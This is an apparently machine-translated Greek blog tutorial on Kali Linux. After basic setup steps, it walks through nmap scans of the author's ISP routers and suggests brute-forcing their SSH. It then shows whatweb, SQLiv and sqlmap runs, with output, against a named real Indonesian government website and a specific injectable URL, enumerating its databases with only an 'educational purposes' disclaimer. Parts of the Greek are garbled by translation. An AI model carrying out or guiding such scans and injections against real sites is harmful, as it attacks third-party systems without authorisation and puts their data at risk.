Εκπαιδευτικό πρόγραμμα Kali Linux

Kali Linux Tutorial



Εάν είστε ειδικός ή τουλάχιστον εξοικειωμένος με το Linux, τις εντολές και το περιβάλλον, μόλις εγκαταστήσατε το Kali Linux στο μηχάνημά σας, θέλετε να γίνετε κύριος του Kali Linux ή ένας Ηθικός Χάκερ, τότε βρίσκεστε στο σωστό μέρος. Σε αυτό το άρθρο, θα καλύψω ένα σεμινάριο Kali Linux για χρήστες Linux που δεν είναι ήδη εξοικειωμένοι με το Kali και θα σας ξεκινήσω με μερικές από τις βασικές τεχνικές που χρησιμοποιούνται για hacking και δοκιμές ασφαλείας κατά τη χρήση του Kali.

Τι είναι το Kali Linux;

Kali Linux, ( κυκλοφόρησε για πρώτη φορά στις 13 Μαρτίου 2013 ), η οποία ήταν επίσημα γνωστή ως BackTrack, που αναπτύχθηκε από την εταιρεία ασφαλείας Offensive Security, είναι μια εγκληματολογική και επικεντρωμένη στην ασφάλεια διανομή που βασίζεται στον κλάδο δοκιμών του Debian. Το Kali Linux έχει σχεδιαστεί με γνώμονα τη δοκιμή διείσδυσης, την ανάκτηση δεδομένων και τον εντοπισμό απειλών. Το έργο μετατράπηκε σε μοντέλο κυκλοφορίας νωρίτερα φέτος σε μια προσπάθεια να παρέχει πιο ενημερωμένα βοηθητικά προγράμματα ασφαλείας στους χρήστες της διανομής. Το Kali Linux είναι δωρεάν και θα είναι πάντα. Περιλαμβάνει 600+ εργαλεία ελέγχου διείσδυσης.







Γιατί Kali Linux; Είναι κατάλληλο για εσάς;

Το Kali Linux έχει αποκτήσει μεγάλη δημοτικότητα πρόσφατα. Και υπάρχει ένας λόγος πίσω από αυτό. Το Hacking επιστρέφει ως το πιο δροσερό πράγμα στη λαϊκή κουλτούρα και αυτό μπορεί να αποδοθεί σημαντικά στην τηλεοπτική σειρά Mr. Robot. Η δημοτικότητα του κ. Robot βοήθησε το Kali Linux να αποκτήσει νέους χρήστες. Άτομα με σχεδόν καθόλου γνώση του Linux ή οτιδήποτε σχετίζεται με την ασφάλεια των υπολογιστών προσπαθούν τώρα να χρησιμοποιήσουν το Kali ως κύρια διανομή Linux.



Η πιο προηγμένη διανομή δοκιμών διείσδυσης, ποτέ. - Προγραμματιστές Kali Linux. (Γράφεται στην κύρια σελίδα του Kali.org στο επάνω μέρος της σελίδας.) Τι παίρνετε από αυτήν τη δήλωση; Το παρατηρείτε: APTD (Advanced Penetration Testing Distribution); Δεν υπάρχει όρος hacking εδώ κυριολεκτικά. Το Kali Linux είναι το ίδιο με άλλες διανομές Linux. Με απλά λόγια, είναι μια διανομή Linux γεμάτη με εργαλεία που σχετίζονται με την ασφάλεια και απευθύνονται σε ειδικούς ασφάλειας δικτύου και υπολογιστών. Ωστόσο, η χρήση του Kali Linux εστιάζει μόνο στην ασφάλεια και την ιατροδικαστική.



Μια διανομή Linux δεν είναι τίποτα περισσότερο από μια δέσμη που περιέχει τον πυρήνα Linux, ένα σύνολο βασικών βοηθητικών προγραμμάτων και εφαρμογών και ορισμένες προεπιλεγμένες ρυθμίσεις. Έτσι, το Kali Linux δεν προσφέρει κάτι μοναδικό υπό αυτήν την έννοια τα περισσότερα από τα παρεχόμενα εργαλεία θα μπορούσαν να εγκατασταθούν σε οποιαδήποτε διανομή Linux.





Το Kali Linux έχει σχεδιαστεί ειδικά για να πληροί τις απαιτήσεις της επαγγελματικής δοκιμής διείσδυσης και του ελέγχου ασφαλείας. Απευθύνεται σε ένα συγκεκριμένο υποσύνολο χρηστών Linux. Pentesters, hackers, κ.λπ. Δεν συνιστάται διανομή εάν περιμένετε το Kali για γενικής χρήσης επιφάνεια εργασίας Linux για ανάπτυξη, σχεδιασμό ιστοσελίδων, παιχνίδια, γραφείο κ.λπ. Το

ΠΡΑΓΜΑΤΑ ΠΟΥ ΝΑ ΚΑΝΕΤΕ ΜΕΤΑ ΤΗΝ ΕΓΚΑΤΑΣΤΑΣΗ ΤΟΥ KALI LINUX

Μετά την εγκατάσταση του Kali Linux, ίσως αναρωτηθείτε τι θα κάνετε στη συνέχεια, σωστά ;. Όλοι αντιμετωπίζουν αυτό το πρόβλημα, μην ανησυχείτε.



ΒΗΜΑ 1: ΡΥΘΜΙΣΤΕ ΤΟ ΑΠΟΘΗΚΗ

Πρώτον, μπορεί να το γνωρίζετε ήδη, αλλά είναι κρίσιμο να ορίσετε σωστά το αποθετήριο. Όπως είπα, το μοντέλο κυλιόμενης κυκλοφορίας Kali Linux προσπαθεί να παρέχει πιο ενημερωμένα βοηθητικά προγράμματα ασφαλείας στους χρήστες της διανομής. Γενικά, εάν έχετε πρόσφατα εγκατεστημένο το Kali Linux, το αποθετήριο αναφέρεται στα μέσα που χρησιμοποιείτε για εγκατάσταση. Για να το διορθώσετε, πρέπει να αλλάξετε το αποθετήριο στο επίσημο αποθετήριο Kali Linux. Το αρχείο που απαιτείται βρίσκεται κάτω /etc/apt/sources.list Το Ανοίξτε το αρχείο με επεξεργαστή κειμένου φύλλου και αντικαταστήστε το προεπιλεγμένο αποθετήριο σε αυτό το επίσημο αποθετήριο Kali Rolling:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

ΒΗΜΑ 2: ΕΝΗΜΕΡΩΣΗ ΚΑΙ ΑΝΑΒΑΘΜΙΣΗ ΤΟΥ KALI LINUX

Μετά από αυτήν την ενημέρωση και αναβάθμιση του συστήματός σας, συγχρονίστε το Kali Linux με την πιο πρόσφατη έκδοση. Για να το κάνετε αυτό, ανοίξτε το τερματικό και πληκτρολογήστε:

apt update -y && apt upgrade -y && apt dist-upgrade 

Η εντολή apt update πραγματοποιεί λήψη και λήψη του πακέτου που απαριθμεί τις πληροφορίες από τα αποθετήρια και τις ενημερώνει για να λάβει πληροφορίες σχετικά με τις νεότερες εκδόσεις των πακέτων και τις εξαρτήσεις τους.

Η εντολή apt upgrade πραγματοποιεί λήψη και εγκατάσταση νεότερης έκδοσης των πακέτων εγκατεστημένων πακέτων Kali Linux αρκεί να μην έχει σφάλματα σε εξαρτήσεις.

Η apt dist-upgrade θα ενημερώσει όλα τα πακέτα στην πιο πρόσφατη διαθέσιμη έκδοση, ανεξάρτητα από το τι. Και επίσης να εγκαταστήσετε και να αφαιρέσετε εξαρτήσεις όπως απαιτείται (εγκαταστήστε εξαρτήσεις για να ικανοποιήσετε πακέτα, προφανώς, αλλά επίσης αφαιρέστε τις εξαρτήσεις που έμειναν ορφανές εάν ένα πακέτο που ενημερώθηκε δεν χρειαζόταν πλέον την εξάρτηση.

ΒΑΣΙΚΗ ΕΝΝΟΙΑ ΔΟΚΙΜΗΣ ΔΙΑΔΟΞΗΣ ΜΕ ΤΟ KALI LINUX

Αφού ολοκληρώσετε με επιτυχία αυτά τα βήματα, υπάρχουν τρία βασικά πράγματα που μπορείτε να κάνετε με το Kali Linux με βάση το στοχευμένο σύστημα, όπως:

  1. Hacking ασύρματου δικτύου - Παραβίαση Wi -Fi, Phising, δηλητηρίαση ARP κλπ.
  2. Hacking εφαρμογών Ιστού -SQL Injection, Cross-Site Request Forgery (CSRF), Web Phising κ.λπ.
  3. Hacking συσκευής - Εκμεταλλευτείτε τη μηχανή -στόχο για να αποκτήσετε τον έλεγχο της.

Δεν συμπεριλαμβάνω το hacking του IoT, δεν σημαίνει ότι το Kali Linux δεν έχει καμία ικανότητα για αυτόν τον σκοπό. Αλλά, κυριολεκτικά θα μπορούσε να ανήκει και στο Device Hacking. Δεδομένου ότι η συσκευή έχει φυσική εμφάνιση και μορφή. Σε αυτό το σεμινάριο κάλυψα τις βασικές γνώσεις τους. Δεδομένου ότι, το Kali Linux είναι τεράστιο, δεν ταιριάζει σε ένα άρθρο!

Πρέπει επίσης να γνωρίζετε τον κύκλο δοκιμής διείσδυσης ή τη διαδικασία. Αυτοί είναι:

  1. Αναγνώριση - Συλλογή πληροφοριών
  2. Ερευνα
  3. Λειτουργία
  4. Μεταεκμετάλλευση

ΑΣΥΡΜΑΤΟ ΔΙΚΤΥΟ ΧΑΚΙΖΕΙ ΜΕ ΚΑΛΙ ΛΙΝΟΥΞ

Όσον αφορά την παραβίαση ασύρματου δικτύου, το θύμα μπορεί να διαφέρει. Επειδή, τα ασύρματα δίκτυα αποτελούνται από πολλά πράγματα, όπως ISP (Internet Service Provider), το δρομολογητή και τους συνεργάτες του (modem, hub, switch κ.λπ.) και τους πελάτες (χρήστες, CCTV, απομακρυσμένος υπολογιστής κ.λπ.). Έχουν επίσης ευάλωτες δυνατότητες.

Το Διαδίκτυο είναι μια μεγάλη και πολύπλοκη συλλογή υλικού δικτύου, συνδεδεμένη μεταξύ τους με πύλες. Η παρακολούθηση της διαδρομής που ακολουθούν τα πακέτα σας είναι σημαντική για να γνωρίζετε πώς προσεγγίζετε ένα συγκεκριμένο όνομα κεντρικού υπολογιστή ή μια διεύθυνση IP προορισμού.

Το Kali Linux διαθέτει ένα ενσωματωμένο εργαλείο που ονομάζεται Traceroute. Το Traceroute χρησιμοποιεί το χρόνο πρωτοκόλλου IP για ζωντανό πεδίο και προσπαθεί να προκαλέσει μια ICMP TIME_EXCEEDED απάντηση από κάθε πύλη κατά μήκος της διαδρομής σε κάποιο κεντρικό υπολογιστή. Το Traceroute προσπαθεί να εντοπίσει τη διαδρομή που θα ακολουθούσε ένα πακέτο IP σε κάποιο διακομιστή διαδικτύου, ξεκινώντας πακέτα ανιχνευτών με μικρό TTL (χρόνος ζωής) και στη συνέχεια η ακρόαση για χρόνο ICMP υπερέβη την απάντηση από μια πύλη. Θα σας δώσω και παράδειγμα πώς να εντοπίσετε έναν δρομολογητή ISP που χρησιμοποιείται για τον χειρισμό της σύνδεσής μας χρησιμοποιώντας το Traceroute.

1. Αναγνώριση

Η συλλογή πληροφοριών είναι το πιο σημαντικό ξεκίνημα, μην χάσετε αυτό το βήμα. Σε αυτό το βήμα, σκοπός μας είναι να αποκτήσουμε όσο το δυνατόν περισσότερες χρήσιμες πληροφορίες που θα μπορούσαμε να λάβουμε και στη συνέχεια αυτές οι πληροφορίες χρησιμοποιούνται για περαιτέρω βήματα.

Αρχικά, ανοίξτε ένα τερματικό και πληκτρολογήστε αυτήν την εντολή για να αρχίσετε να εντοπίζετε το δρόμο προς τον ιστότοπο, σε αυτήν την περίπτωση ορίζω τον ιστότοπο στο google.com.

traceroute google.com 

Στιγμιότυπο οθόνης Traceroute

2. Σάρωση

Μόλις ξεκινήσουμε τις εντολές, θα αναφέρει πού πηγαίνει το πακέτο μας με τη σειρά. Όπως μπορείτε να δείτε παραπάνω, πήρα 3 λυκίσκους, ένας από αυτούς είναι ο διακομιστής ISP μου. Η πρώτη IP στη λίστα είναι ο δρομολογητής μου, ο οποίος λειτουργεί ως πύλη. Και τα δύο επόμενα από αυτά ανήκουν στον ISP μου. Τώρα ας ελέγξουμε την υπηρεσία που εκτελούν χρησιμοποιώντας το Nmap. Έτσι, οι στόχοι που πρόκειται να σαρώσουμε είναι 10.152.192.1 και 10.13.223.102 Το Στο τερματικό έκανα την ακόλουθη εντολή:

nmap -v -sS [IP Target] -Pn 

Ας αναλύσουμε το επιχείρημα της εντολής:

-v = Ενεργοποιήστε τη λειτουργία λεκτικότητας

-sS = Χρησιμοποιήστε την τεχνική σάρωσης TCP SYN

-Pn = Αντιμετωπίστε όλους τους κεντρικούς υπολογιστές ως διαδικτυακούς -παραλείψτε την ανακάλυψη κεντρικού υπολογιστή

Και εδώ είναι το αποτέλεσμα που πήραμε.

λήψη οθόνης nmap 2

Δυστυχώς, όλες οι θύρες είναι ενεργοποιημένες 10.152.192.1 φιλτράρονται, σημαίνει ότι όλες οι εισερχόμενες συνδέσεις TCP αποκλείονται από το IDS ή το τείχος προστασίας σε αυτήν την IP. Τώρα, ας πάμε άλλη σάρωση στον δεύτερο στόχο.

λήψη οθόνης nmap 1

3. Λειτουργία

Σε αυτή τη διαδικασία, δεν σκοπεύω να διεξάγω την πραγματική εκμετάλλευση, αλλά σας δείχνω πώς. Με βάση το αποτέλεσμα σάρωσης Nmap παραπάνω γνωρίζουμε ότι αυτή η IP έχει διακομιστή SSH που λειτουργεί στη θύρα 22 και είναι ανοιχτή. Είναι ανοιχτό για να γίνεις σκληρός, χαχα! Βρήκαμε την τρύπα, αυτός ο διακομιστής SSH είναι η πιθανή τρύπα στην οποία θα μπορούσαμε να προσπαθήσουμε να αποκτήσουμε πρόσβαση. Υπάρχουν πολλά εργαλεία στο Kali Linux που υποστηρίζουν επιθέσεις bruteforce ή λεξικού κατά πρωτοκόλλου SSH. Η πιο δημοφιλής και ισχυρή είναι η ydδρα.

Εντάξει, αυτή ήταν μια βασική διαδικασία που διεξήγαγε μια δοκιμή διείσδυσης σε έναν στοχευμένο διακομιστή, ο οποίος στο παράδειγμά μας εδώ είναι ο διακομιστής ISP μου.

ΕΦΑΡΜΟΓΕΣ WEB HACKING ΜΕ ΤΟ KALI LINUX

Στην πραγματικότητα, αν είστε παθιασμένοι με αυτό, μπορείτε να ρυθμίσετε το περιβάλλον hacking εγκαθιστώντας το DWVA (Damn Vulnerable Web App) στο Kali Linux σας. Είναι μια εφαρμογή web PHP/MySQL που έχει ένα σωρό ευάλωτη τρύπα. Οι κύριοι στόχοι του είναι να είναι μια βοήθεια για τους επαγγελματίες ασφάλειας να δοκιμάσουν τις ικανότητες και τα εργαλεία τους σε ένα νομικό περιβάλλον και να βοηθήσει τους προγραμματιστές ιστού να κατανοήσουν καλύτερα τις διαδικασίες ασφάλειας εφαρμογών Ιστού. Μπορείτε να λάβετε το DWVA δωρεάν στο Github εδώ: https://github.com/ethicalhack3r/DVWA.

Προς το παρόν, θα σας δείξω πώς να κάνετε hacking εφαρμογών Ιστού σε έναν πραγματικό ιστότοπο. Αλλά, υπόσχεσέ μου ότι περιορίζεται μόνο σε εκπαιδευτικούς σκοπούς. Θα προσομοιώσουμε μια πραγματική επίθεση σε πραγματικό site χρησιμοποιώντας SQL ένεση.

Προαπαιτούμενο

Εργαλεία που καλύπτονται:

-Whatweb (προεγκατεστημένο)

-Nmap (προεγκατεστημένο)

- SQLiv (χειροκίνητη εγκατάσταση)

-SQLMap (προεγκατεστημένο)

Χρειαζόμαστε ένα ακόμη πρόσθετο εργαλείο που είναι διαθέσιμο στο Github εδώ: https://github.com/Hadesy2k/sqliv, εγκαταστήστε το πρώτα στο Kali Linux μας. Αυτό το εργαλείο ονομάζεται SQLiv το οποίο είναι σε θέση να κάνει στοχευμένη σάρωση παρέχοντας συγκεκριμένο τομέα (με ανίχνευση). Πληκτρολογήστε το τερματικό:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Στόχος: www.trenggalekkab.go.id

1. Αναγνώριση

Συλλέξτε όσες χρήσιμες πληροφορίες μπορούσαμε να πάρουμε. Θα μπορούσαμε να ανοίξουμε την ιστοσελίδα και να εντοπίσουμε ποια εφαρμογή εκτελείται σε αυτόν τον ιστότοπο. Πρώτον, ας ελέγξουμε τι είδους ιστότοπος είναι. Θα χρησιμοποιήσουμε το whatweb για να το κάνουμε αυτό.

whatweb www.trenggalekkab.go.id 

Τι Web Screenshot

Όπως μπορείτε να δείτε το παραπάνω αποτέλεσμα, ο στόχος βρίσκεται στην Ινδονησία. Τρέχει Apache v2.2.27 στον διακομιστή ιστού του και επίσης έχει PHP v5.4.31 , έχει διεύθυνση IP 103.247.21.142 Το Εντάξει, σημείωσε το. Mayσως χρειαστεί να επισκεφθείτε την ιστοσελίδα του, αναζητώντας το αρχείο ή τη σελίδα που έχει κατασκευαστεί, τις παραμέτρους URL ή ακόμη και τη φόρμα σύνδεσης. Προς το παρόν χρειαζόμαστε αυτήν τη διεύθυνση IP για το επόμενο βήμα που είναι η σάρωση.

2. Σάρωση

Όπως και πριν, χρησιμοποιούμε ξανά το Nmap για να σαρώσουμε ποιες θύρες και υπηρεσίες εκτελούνται στον στόχο.

nmap -v -sS 103.247.21.142 

Και εδώ είναι το αποτέλεσμα που πήραμε:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Υπάρχουν δέσμες ανοικτών θυρών που χειρίζονται κάθε υπηρεσία στο στόχο, αλλά αυτή που φαίνεται εντυπωσιακή είναι αυτή η υπηρεσία mysql στη θύρα 3306. Υποδεικνύεται ότι αυτός ο ιστότοπος χρησιμοποιεί mysql για τη διαχείριση των πληροφοριών τους σε βάσεις δεδομένων. Στη συνέχεια, αναρωτιέμαι αν υπάρχουν τρωτά σημεία SQL Injection σε αυτόν τον ιστότοπο. Έτσι, σαρώνω ξανά τον ιστότοπο χρησιμοποιώντας το SQLiv που μόλις εγκαταστήσαμε. Έγραψα την εντολή:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Βρήκαμε 2 πιθανά ευπαθή URL SQL σε αυτόν τον ιστότοπο. Σημειώστε αυτά τα URL.

3. Λειτουργία

Εντάξει, έχουμε ευάλωτες διευθύνσεις URL SQL και έτοιμες για εκτέλεση. Για να το κάνουμε αυτό, θα χρησιμοποιήσουμε το SQLMap. Η σύνταξη είναι:

sqlmap [Vulnerable URL] --dbs 

Η εντολή πρέπει να μοιάζει με αυτήν:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Το επιχείρημα –dbs είναι να πείτε στο SQLMap να αποκτήσει βάσεις δεδομένων στόχων. Εδώ είναι η έξοδος που πήραμε:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

Το SQLMap βρήκε 2 βάσεις δεδομένων, αλλά μόνο μία από αυτές που περιέχει ευαίσθητα δεδομένα, όπως έναν λογαριασμό διαπιστευτηρίων διαχειριστή. Αυτό είναι στο trengkab_trg. Αφού βρούμε τις βάσεις δεδομένων, υπάρχει ακόμα ένα βήμα που πρέπει να κάνουμε. Αυτό είναι να βρείτε τους πίνακες και τις στήλες και το τελευταίο βήμα είναι να απορρίψετε τα δεδομένα. Δεν θα σας δείξω πώς εδώ σε αυτήν την ενότητα, χρησιμοποιώντας αυτόν τον στόχο. Τουλάχιστον γνωρίζετε τη βασική ιδέα για τον κύκλο επίθεσης και χρησιμοποιώντας κάποια εργαλεία.

ΧΑΚΙΡΙΣΜΟΣ ΣΥΣΚΕΥΗΣ

Σε μελλοντικό άρθρο σε αυτόν τον ιστότοπο θα καλύψουμε το hacking συσκευών, μείνετε συντονισμένοι. Ως προειδοποίηση θα θέλετε να βεβαιωθείτε ότι γνωρίζετε κάποια Python για αυτό.